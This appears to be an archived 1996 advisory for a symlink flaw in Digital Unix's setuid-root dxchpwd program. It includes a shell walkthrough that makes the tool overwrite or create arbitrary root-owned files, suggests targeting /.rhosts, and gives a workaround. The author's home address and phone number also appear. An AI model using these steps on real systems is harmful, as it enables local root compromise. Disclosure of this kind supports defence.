Digital Unix /usr/tcb/bin/dxchpwd hole

Summary

Description:	In Digital Unix, /usr/tcb/bin/dxchpwd creates log files in a very insecure manner.
Author:	Eric Augustus (augustus@mail.stic.net)
Compromise:	root (local)
Vulnerable Systems:	at least Digital Unix v3.x with c2 security package installed
Date:	17 November 1996

Details

Exploit:

Subject: BoS: Digital Unix v3.x (v4.x?) security vulnerability
From: Eric Augustus (augustus@mail.stic.net)
Date: Sun, 17 Nov 1996 00:09:38 +0000 

In Digital Unix (OSF/1) v3.x, there is a security vulnerability in the
/usr/tcb/bin/dxchpwd program. The dxchpwd is installed as part of the
C2 security package. The dxchpwd can be used to overwrite any file, or
create a file anywhere on the system causing a possible denial of
service and possibly lead to root access.

Background: dxchpwd is part of the C2 security package and is setuid
root. It's a GUI interface for a users to change their passwds. As far
as I know, all Digital Unix v3.x versions are vulnerable, and possibly
4.x.

Details: When dxchpwd is run, it creates a log file /tmp/dxchpwd.log
which is root owned and mode 600. If the log file doesn't exist, it
can be symlinked to any existing file, or new file on the system. New
files are created root owned, mode 600.  Existing files retain their
permissions and ownership, but their contents are overwritten. If a
user then attempts to change a passwd, a message similar to the
following is written to the log file:

Unknown SIA Prompt: (* Permission denied.
 *) rendition 6

In this case, if /.rhosts were symlinked to /tmp/dxchpwd.log, then a
host known as Unknown could possibly gain root access.

Example:
$ ls -l /usr/tcb/bin/dxchpwd
-rwsr-xr-x   1 root     bin        49152 Jul 25  1995 /usr/tcb/bin/dxchpwd
$ ls -l /tmp/dxchpwd.log
/tmp/dxchpwd.log not found
$ export DISPLAY=:0     (or a remotehost)
$ ln -s /hackfile /tmp/dxchpwd
$ ls -l /hackfile
/hackfile not found
$ /usr/tcb/bin/dxchpwd
(The dxchpwd window will appear. Just enter root for username
 and anything for the passwd. You'll get a permission denied
message and the window will close.)
$ ls -l /hackfile
-rw-------   1 root     system         0 Nov 16 22:44 /hackfile

Fix: Make sure /tmp/dxchpwd.log exists, which is root owned and at
least mode 600 until a patch is available. Of course, the setuid bit
could be removed, but then users couldn't use it to change their
passwds.

Gus
--
_________________________________________________________________________
Eric Augustus
1211 Saxonhill Drive
San Antonio, TX  78253
(210) 679-6497
augustus@stic.net
_____________________ #INCLUDE  _______________________
You May Be an Engineer if...
    people groan at the party when you pick out the music

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: